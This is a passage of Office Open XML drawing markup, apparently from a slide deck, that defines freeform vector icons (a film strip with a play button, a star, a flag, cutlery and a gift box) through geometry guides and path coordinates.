                  <a:gd name="T77" fmla="*/ 8 h 101"/>
                  <a:gd name="T78" fmla="*/ 126 w 134"/>
                  <a:gd name="T79" fmla="*/ 26 h 101"/>
                  <a:gd name="T80" fmla="*/ 51 w 134"/>
                  <a:gd name="T81" fmla="*/ 26 h 101"/>
                  <a:gd name="T82" fmla="*/ 51 w 134"/>
                  <a:gd name="T83" fmla="*/ 77 h 101"/>
                  <a:gd name="T84" fmla="*/ 84 w 134"/>
                  <a:gd name="T85" fmla="*/ 51 h 101"/>
                  <a:gd name="T86" fmla="*/ 51 w 134"/>
                  <a:gd name="T87" fmla="*/ 2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101">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="93"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="59"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="26"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="102" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="35" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="93"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="126" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="93"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="126" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="59"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="126" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="26"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="51" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="51" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51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63125E61-7149-4EFE-BF06-C24417E0B0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33281" y="3027613"/>
                <a:ext cx="156586" cy="146799"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 80 w 80"/>
                  <a:gd name="T1" fmla="*/ 29 h 75"/>
                  <a:gd name="T2" fmla="*/ 52 w 80"/>
                  <a:gd name="T3" fmla="*/ 24 h 75"/>
                  <a:gd name="T4" fmla="*/ 41 w 80"/>
                  <a:gd name="T5" fmla="*/ 0 h 75"/>
                  <a:gd name="T6" fmla="*/ 28 w 80"/>
                  <a:gd name="T7" fmla="*/ 24 h 75"/>
                  <a:gd name="T8" fmla="*/ 0 w 80"/>
                  <a:gd name="T9" fmla="*/ 29 h 75"/>
                  <a:gd name="T10" fmla="*/ 19 w 80"/>
                  <a:gd name="T11" fmla="*/ 49 h 75"/>
                  <a:gd name="T12" fmla="*/ 15 w 80"/>
                  <a:gd name="T13" fmla="*/ 75 h 75"/>
                  <a:gd name="T14" fmla="*/ 41 w 80"/>
                  <a:gd name="T15" fmla="*/ 62 h 75"/>
                  <a:gd name="T16" fmla="*/ 65 w 80"/>
                  <a:gd name="T17" fmla="*/ 75 h 75"/>
                  <a:gd name="T18" fmla="*/ 60 w 80"/>
                  <a:gd name="T19" fmla="*/ 49 h 75"/>
                  <a:gd name="T20" fmla="*/ 80 w 80"/>
                  <a:gd name="T21" fmla="*/ 29 h 75"/>
                  <a:gd name="T22" fmla="*/ 41 w 80"/>
                  <a:gd name="T23" fmla="*/ 57 h 75"/>
                  <a:gd name="T24" fmla="*/ 23 w 80"/>
                  <a:gd name="T25" fmla="*/ 65 h 75"/>
                  <a:gd name="T26" fmla="*/ 26 w 80"/>
                  <a:gd name="T27" fmla="*/ 45 h 75"/>
                  <a:gd name="T28" fmla="*/ 11 w 80"/>
                  <a:gd name="T29" fmla="*/ 32 h 75"/>
                  <a:gd name="T30" fmla="*/ 31 w 80"/>
                  <a:gd name="T31" fmla="*/ 29 h 75"/>
                  <a:gd name="T32" fmla="*/ 41 w 80"/>
                  <a:gd name="T33" fmla="*/ 11 h 75"/>
                  <a:gd name="T34" fmla="*/ 49 w 80"/>
                  <a:gd name="T35" fmla="*/ 29 h 75"/>
                  <a:gd name="T36" fmla="*/ 68 w 80"/>
                  <a:gd name="T37" fmla="*/ 32 h 75"/>
                  <a:gd name="T38" fmla="*/ 54 w 80"/>
                  <a:gd name="T39" fmla="*/ 45 h 75"/>
                  <a:gd name="T40" fmla="*/ 57 w 80"/>
                  <a:gd name="T41" fmla="*/ 65 h 75"/>
                  <a:gd name="T42" fmla="*/ 41 w 80"/>
                  <a:gd name="T43" fmla="*/ 57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0" h="75">
                    <a:moveTo>
                      <a:pt x="80" y="29"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="52" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="29"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="57"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4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5917C6B9-0F8B-4046-85D3-2CD5467F3A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8503" y="1526343"/>
                <a:ext cx="191818" cy="207477"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 60"/>
                  <a:gd name="T1" fmla="*/ 11 h 65"/>
                  <a:gd name="T2" fmla="*/ 60 w 60"/>
                  <a:gd name="T3" fmla="*/ 6 h 65"/>
                  <a:gd name="T4" fmla="*/ 60 w 60"/>
                  <a:gd name="T5" fmla="*/ 44 h 65"/>
                  <a:gd name="T6" fmla="*/ 48 w 60"/>
                  <a:gd name="T7" fmla="*/ 48 h 65"/>
                  <a:gd name="T8" fmla="*/ 36 w 60"/>
                  <a:gd name="T9" fmla="*/ 45 h 65"/>
                  <a:gd name="T10" fmla="*/ 24 w 60"/>
                  <a:gd name="T11" fmla="*/ 41 h 65"/>
                  <a:gd name="T12" fmla="*/ 12 w 60"/>
                  <a:gd name="T13" fmla="*/ 46 h 65"/>
                  <a:gd name="T14" fmla="*/ 12 w 60"/>
                  <a:gd name="T15" fmla="*/ 8 h 65"/>
                  <a:gd name="T16" fmla="*/ 24 w 60"/>
                  <a:gd name="T17" fmla="*/ 4 h 65"/>
                  <a:gd name="T18" fmla="*/ 36 w 60"/>
                  <a:gd name="T19" fmla="*/ 7 h 65"/>
                  <a:gd name="T20" fmla="*/ 48 w 60"/>
                  <a:gd name="T21" fmla="*/ 11 h 65"/>
                  <a:gd name="T22" fmla="*/ 4 w 60"/>
                  <a:gd name="T23" fmla="*/ 0 h 65"/>
                  <a:gd name="T24" fmla="*/ 8 w 60"/>
                  <a:gd name="T25" fmla="*/ 4 h 65"/>
                  <a:gd name="T26" fmla="*/ 8 w 60"/>
                  <a:gd name="T27" fmla="*/ 65 h 65"/>
                  <a:gd name="T28" fmla="*/ 0 w 60"/>
                  <a:gd name="T29" fmla="*/ 65 h 65"/>
                  <a:gd name="T30" fmla="*/ 0 w 60"/>
                  <a:gd name="T31" fmla="*/ 4 h 65"/>
                  <a:gd name="T32" fmla="*/ 4 w 60"/>
                  <a:gd name="T33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65">
                    <a:moveTo>
                      <a:pt x="48" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="11"/>
                      <a:pt x="58" y="8"/>
                      <a:pt x="60" y="6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58" y="46"/>
                      <a:pt x="53" y="48"/>
                      <a:pt x="48" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="48"/>
                      <a:pt x="39" y="47"/>
                      <a:pt x="36" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="43"/>
                      <a:pt x="29" y="41"/>
                      <a:pt x="24" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="41"/>
                      <a:pt x="15" y="44"/>
                      <a:pt x="12" y="46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5" y="6"/>
                      <a:pt x="19" y="4"/>
                      <a:pt x="24" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="4"/>
                      <a:pt x="33" y="5"/>
                      <a:pt x="36" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="9"/>
                      <a:pt x="43" y="11"/>
                      <a:pt x="48" y="11"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="4" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="8" y="1"/>
                      <a:pt x="8" y="4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1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1" name="Freeform 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C34D333-7AFE-491E-94BB-217704F100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5795" y="1424562"/>
                <a:ext cx="203562" cy="207477"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 64"/>
                  <a:gd name="T1" fmla="*/ 0 h 65"/>
                  <a:gd name="T2" fmla="*/ 44 w 64"/>
                  <a:gd name="T3" fmla="*/ 11 h 65"/>
                  <a:gd name="T4" fmla="*/ 44 w 64"/>
                  <a:gd name="T5" fmla="*/ 41 h 65"/>
                  <a:gd name="T6" fmla="*/ 52 w 64"/>
                  <a:gd name="T7" fmla="*/ 41 h 65"/>
                  <a:gd name="T8" fmla="*/ 52 w 64"/>
                  <a:gd name="T9" fmla="*/ 65 h 65"/>
                  <a:gd name="T10" fmla="*/ 64 w 64"/>
                  <a:gd name="T11" fmla="*/ 65 h 65"/>
                  <a:gd name="T12" fmla="*/ 64 w 64"/>
                  <a:gd name="T13" fmla="*/ 11 h 65"/>
                  <a:gd name="T14" fmla="*/ 54 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 65"/>
                  <a:gd name="T16" fmla="*/ 26 w 64"/>
                  <a:gd name="T17" fmla="*/ 0 h 65"/>
                  <a:gd name="T18" fmla="*/ 24 w 64"/>
                  <a:gd name="T19" fmla="*/ 2 h 65"/>
                  <a:gd name="T20" fmla="*/ 24 w 64"/>
                  <a:gd name="T21" fmla="*/ 17 h 65"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 18 h 65"/>
                  <a:gd name="T24" fmla="*/ 20 w 64"/>
                  <a:gd name="T25" fmla="*/ 17 h 65"/>
                  <a:gd name="T26" fmla="*/ 20 w 64"/>
                  <a:gd name="T27" fmla="*/ 2 h 65"/>
                  <a:gd name="T28" fmla="*/ 18 w 64"/>
                  <a:gd name="T29" fmla="*/ 0 h 65"/>
                  <a:gd name="T30" fmla="*/ 16 w 64"/>
                  <a:gd name="T31" fmla="*/ 2 h 65"/>
                  <a:gd name="T32" fmla="*/ 16 w 64"/>
                  <a:gd name="T33" fmla="*/ 17 h 65"/>
                  <a:gd name="T34" fmla="*/ 14 w 64"/>
                  <a:gd name="T35" fmla="*/ 18 h 65"/>
                  <a:gd name="T36" fmla="*/ 12 w 64"/>
                  <a:gd name="T37" fmla="*/ 17 h 65"/>
                  <a:gd name="T38" fmla="*/ 12 w 64"/>
                  <a:gd name="T39" fmla="*/ 2 h 65"/>
                  <a:gd name="T40" fmla="*/ 10 w 64"/>
                  <a:gd name="T41" fmla="*/ 0 h 65"/>
                  <a:gd name="T42" fmla="*/ 8 w 64"/>
                  <a:gd name="T43" fmla="*/ 2 h 65"/>
                  <a:gd name="T44" fmla="*/ 8 w 64"/>
                  <a:gd name="T45" fmla="*/ 17 h 65"/>
                  <a:gd name="T46" fmla="*/ 6 w 64"/>
                  <a:gd name="T47" fmla="*/ 18 h 65"/>
                  <a:gd name="T48" fmla="*/ 4 w 64"/>
                  <a:gd name="T49" fmla="*/ 17 h 65"/>
                  <a:gd name="T50" fmla="*/ 4 w 64"/>
                  <a:gd name="T51" fmla="*/ 2 h 65"/>
                  <a:gd name="T52" fmla="*/ 2 w 64"/>
                  <a:gd name="T53" fmla="*/ 0 h 65"/>
                  <a:gd name="T54" fmla="*/ 0 w 64"/>
                  <a:gd name="T55" fmla="*/ 2 h 65"/>
                  <a:gd name="T56" fmla="*/ 0 w 64"/>
                  <a:gd name="T57" fmla="*/ 17 h 65"/>
                  <a:gd name="T58" fmla="*/ 0 w 64"/>
                  <a:gd name="T59" fmla="*/ 21 h 65"/>
                  <a:gd name="T60" fmla="*/ 3 w 64"/>
                  <a:gd name="T61" fmla="*/ 25 h 65"/>
                  <a:gd name="T62" fmla="*/ 8 w 64"/>
                  <a:gd name="T63" fmla="*/ 33 h 65"/>
                  <a:gd name="T64" fmla="*/ 8 w 64"/>
                  <a:gd name="T65" fmla="*/ 65 h 65"/>
                  <a:gd name="T66" fmla="*/ 20 w 64"/>
                  <a:gd name="T67" fmla="*/ 65 h 65"/>
                  <a:gd name="T68" fmla="*/ 20 w 64"/>
                  <a:gd name="T69" fmla="*/ 33 h 65"/>
                  <a:gd name="T70" fmla="*/ 25 w 64"/>
                  <a:gd name="T71" fmla="*/ 25 h 65"/>
                  <a:gd name="T72" fmla="*/ 28 w 64"/>
                  <a:gd name="T73" fmla="*/ 21 h 65"/>
                  <a:gd name="T74" fmla="*/ 28 w 64"/>
                  <a:gd name="T75" fmla="*/ 17 h 65"/>
                  <a:gd name="T76" fmla="*/ 28 w 64"/>
                  <a:gd name="T77" fmla="*/ 2 h 65"/>
                  <a:gd name="T78" fmla="*/ 26 w 64"/>
                  <a:gd name="T7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5">
                    <a:moveTo>
                      <a:pt x="54" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="0"/>
                      <a:pt x="44" y="5"/>
                      <a:pt x="44" y="1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4" y="5"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="54" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="0"/>
                      <a:pt x="24" y="1"/>
                      <a:pt x="24" y="2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23" y="18"/>
                      <a:pt x="22" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="18"/>
                      <a:pt x="20" y="17"/>
                      <a:pt x="20" y="17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1"/>
                      <a:pt x="19" y="0"/>
                      <a:pt x="18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5" y="18"/>
                      <a:pt x="14" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="18"/>
                      <a:pt x="12" y="17"/>
                      <a:pt x="12" y="17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7" y="18"/>
                      <a:pt x="6" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="18"/>
                      <a:pt x="4" y="17"/>
                      <a:pt x="4" y="17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1" y="23"/>
                      <a:pt x="3" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="26"/>
                      <a:pt x="8" y="28"/>
                      <a:pt x="8" y="33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20" y="65"/>
                      <a:pt x="20" y="65"/>
                      <a:pt x="20" y="6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0" y="28"/>
                      <a:pt x="22" y="26"/>
                      <a:pt x="25" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="23"/>
                      <a:pt x="28" y="22"/>
                      <a:pt x="28" y="2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1"/>
                      <a:pt x="27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2" name="Freeform 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B7894A-556B-4DC8-ADFE-79E695ADA8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77048" y="3327085"/>
                <a:ext cx="236837" cy="266197"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 58 w 74"/>
                  <a:gd name="T1" fmla="*/ 25 h 83"/>
                  <a:gd name="T2" fmla="*/ 63 w 74"/>
                  <a:gd name="T3" fmla="*/ 22 h 83"/>
                  <a:gd name="T4" fmla="*/ 68 w 74"/>
                  <a:gd name="T5" fmla="*/ 12 h 83"/>
                  <a:gd name="T6" fmla="*/ 65 w 74"/>
                  <a:gd name="T7" fmla="*/ 3 h 83"/>
                  <a:gd name="T8" fmla="*/ 58 w 74"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
                  <a:gd name="T10" fmla="*/ 46 w 74"/>
                  <a:gd name="T11" fmla="*/ 6 h 83"/>
                  <a:gd name="T12" fmla="*/ 36 w 74"/>
                  <a:gd name="T13" fmla="*/ 24 h 83"/>
                  <a:gd name="T14" fmla="*/ 27 w 74"/>
                  <a:gd name="T15" fmla="*/ 6 h 83"/>
                  <a:gd name="T16" fmla="*/ 18 w 74"/>
                  <a:gd name="T17" fmla="*/ 2 h 83"/>
                  <a:gd name="T18" fmla="*/ 11 w 74"/>
                  <a:gd name="T19" fmla="*/ 5 h 83"/>
                  <a:gd name="T20" fmla="*/ 12 w 74"/>
                  <a:gd name="T21" fmla="*/ 21 h 83"/>
                  <a:gd name="T22" fmla="*/ 18 w 74"/>
                  <a:gd name="T23" fmla="*/ 25 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 74"/>
                  <a:gd name="T25" fmla="*/ 25 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 74"/>
                  <a:gd name="T27" fmla="*/ 47 h 83"/>
                  <a:gd name="T28" fmla="*/ 6 w 74"/>
                  <a:gd name="T29" fmla="*/ 47 h 83"/>
                  <a:gd name="T30" fmla="*/ 6 w 74"/>
                  <a:gd name="T31" fmla="*/ 83 h 83"/>
                  <a:gd name="T32" fmla="*/ 69 w 74"/>
                  <a:gd name="T33" fmla="*/ 83 h 83"/>
                  <a:gd name="T34" fmla="*/ 69 w 74"/>
                  <a:gd name="T35" fmla="*/ 47 h 83"/>
                  <a:gd name="T36" fmla="*/ 74 w 74"/>
                  <a:gd name="T37" fmla="*/ 47 h 83"/>
                  <a:gd name="T38" fmla="*/ 74 w 74"/>
                  <a:gd name="T39" fmla="*/ 25 h 83"/>
                  <a:gd name="T40" fmla="*/ 58 w 74"/>
                  <a:gd name="T41" fmla="*/ 25 h 83"/>
                  <a:gd name="T42" fmla="*/ 50 w 74"/>
                  <a:gd name="T43" fmla="*/ 10 h 83"/>
                  <a:gd name="T44" fmla="*/ 58 w 74"/>
                  <a:gd name="T45" fmla="*/ 6 h 83"/>
                  <a:gd name="T46" fmla="*/ 61 w 74"/>
                  <a:gd name="T47" fmla="*/ 7 h 83"/>
                  <a:gd name="T48" fmla="*/ 59 w 74"/>
                  <a:gd name="T49" fmla="*/ 18 h 83"/>
                  <a:gd name="T50" fmla="*/ 46 w 74"/>
                  <a:gd name="T51" fmla="*/ 25 h 83"/>
                  <a:gd name="T52" fmla="*/ 42 w 74"/>
                  <a:gd name="T53" fmla="*/ 25 h 83"/>
                  <a:gd name="T54" fmla="*/ 50 w 74"/>
                  <a:gd name="T55" fmla="*/ 10 h 83"/>
                  <a:gd name="T56" fmla="*/ 14 w 74"/>
                  <a:gd name="T57" fmla="*/ 12 h 83"/>
                  <a:gd name="T58" fmla="*/ 15 w 74"/>
                  <a:gd name="T59" fmla="*/ 9 h 83"/>
                  <a:gd name="T60" fmla="*/ 18 w 74"/>
                  <a:gd name="T61" fmla="*/ 8 h 83"/>
                  <a:gd name="T62" fmla="*/ 18 w 74"/>
                  <a:gd name="T63" fmla="*/ 8 h 83"/>
                  <a:gd name="T64" fmla="*/ 23 w 74"/>
                  <a:gd name="T65" fmla="*/ 10 h 83"/>
                  <a:gd name="T66" fmla="*/ 30 w 74"/>
                  <a:gd name="T67" fmla="*/ 23 h 83"/>
                  <a:gd name="T68" fmla="*/ 30 w 74"/>
                  <a:gd name="T69" fmla="*/ 24 h 83"/>
                  <a:gd name="T70" fmla="*/ 29 w 74"/>
                  <a:gd name="T71" fmla="*/ 24 h 83"/>
                  <a:gd name="T72" fmla="*/ 17 w 74"/>
                  <a:gd name="T73" fmla="*/ 17 h 83"/>
                  <a:gd name="T74" fmla="*/ 14 w 74"/>
                  <a:gd name="T75" fmla="*/ 12 h 83"/>
                  <a:gd name="T76" fmla="*/ 32 w 74"/>
                  <a:gd name="T77" fmla="*/ 78 h 83"/>
                  <a:gd name="T78" fmla="*/ 11 w 74"/>
                  <a:gd name="T79" fmla="*/ 78 h 83"/>
                  <a:gd name="T80" fmla="*/ 11 w 74"/>
                  <a:gd name="T81" fmla="*/ 44 h 83"/>
                  <a:gd name="T82" fmla="*/ 32 w 74"/>
                  <a:gd name="T83" fmla="*/ 44 h 83"/>
                  <a:gd name="T84" fmla="*/ 32 w 74"/>
                  <a:gd name="T85" fmla="*/ 78 h 83"/>
                  <a:gd name="T86" fmla="*/ 32 w 74"/>
                  <a:gd name="T87" fmla="*/ 41 h 83"/>
                  <a:gd name="T88" fmla="*/ 6 w 74"/>
                  <a:gd name="T89" fmla="*/ 41 h 83"/>
                  <a:gd name="T90" fmla="*/ 6 w 74"/>
                  <a:gd name="T91" fmla="*/ 31 h 83"/>
                  <a:gd name="T92" fmla="*/ 32 w 74"/>
                  <a:gd name="T93" fmla="*/ 31 h 83"/>
                  <a:gd name="T94" fmla="*/ 32 w 74"/>
                  <a:gd name="T95" fmla="*/ 41 h 83"/>
                  <a:gd name="T96" fmla="*/ 63 w 74"/>
                  <a:gd name="T97" fmla="*/ 78 h 83"/>
                  <a:gd name="T98" fmla="*/ 42 w 74"/>
                  <a:gd name="T99" fmla="*/ 78 h 83"/>
                  <a:gd name="T100" fmla="*/ 42 w 74"/>
                  <a:gd name="T101" fmla="*/ 44 h 83"/>
                  <a:gd name="T102" fmla="*/ 63 w 74"/>
                  <a:gd name="T103" fmla="*/ 44 h 83"/>
                  <a:gd name="T104" fmla="*/ 63 w 74"/>
                  <a:gd name="T105" fmla="*/ 78 h 83"/>
                  <a:gd name="T106" fmla="*/ 69 w 74"/>
                  <a:gd name="T107" fmla="*/ 41 h 83"/>
                  <a:gd name="T108" fmla="*/ 42 w 74"/>
                  <a:gd name="T109" fmla="*/ 41 h 83"/>
                  <a:gd name="T110" fmla="*/ 42 w 74"/>
                  <a:gd name="T111" fmla="*/ 31 h 83"/>
                  <a:gd name="T112" fmla="*/ 69 w 74"/>
                  <a:gd name="T113" fmla="*/ 31 h 83"/>
                  <a:gd name="T114" fmla="*/ 69 w 74"/>
                  <a:gd name="T115" fmla="*/ 4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4" h="83">
                    <a:moveTo>
                      <a:pt x="58" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="24"/>
                      <a:pt x="61" y="23"/>
                      <a:pt x="63" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="19"/>
                      <a:pt x="67" y="16"/>
                      <a:pt x="68" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="9"/>
                      <a:pt x="68" y="5"/>
                      <a:pt x="65" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="1"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="58" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="0"/>
                      <a:pt x="50" y="2"/>
                      <a:pt x="46" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="11"/>
                      <a:pt x="38" y="19"/>
                      <a:pt x="36" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="19"/>
                      <a:pt x="32" y="11"/>
                      <a:pt x="27" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="4"/>
                      <a:pt x="21" y="2"/>
                      <a:pt x="18" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="2"/>
                      <a:pt x="13" y="3"/>
                      <a:pt x="11" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="9"/>
                      <a:pt x="8" y="16"/>
                      <a:pt x="12" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="23"/>
                      <a:pt x="16" y="24"/>
                      <a:pt x="18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74" y="47"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="74" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="25"/>
                      <a:pt x="74" y="25"/>
                      <a:pt x="74" y="25"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="58" y="25"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="50" y="10"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="7"/>
                      <a:pt x="56" y="6"/>
                      <a:pt x="58" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="6"/>
                      <a:pt x="60" y="6"/>
                      <a:pt x="61" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="9"/>
                      <a:pt x="62" y="14"/>
                      <a:pt x="59" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="21"/>
                      <a:pt x="50" y="24"/>
                      <a:pt x="46" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="25"/>
                      <a:pt x="42" y="25"/>
                      <a:pt x="42" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="21"/>
                      <a:pt x="46" y="14"/>
                      <a:pt x="50" y="10"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="14" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="12"/>
                      <a:pt x="14" y="10"/>
                      <a:pt x="15" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="8"/>
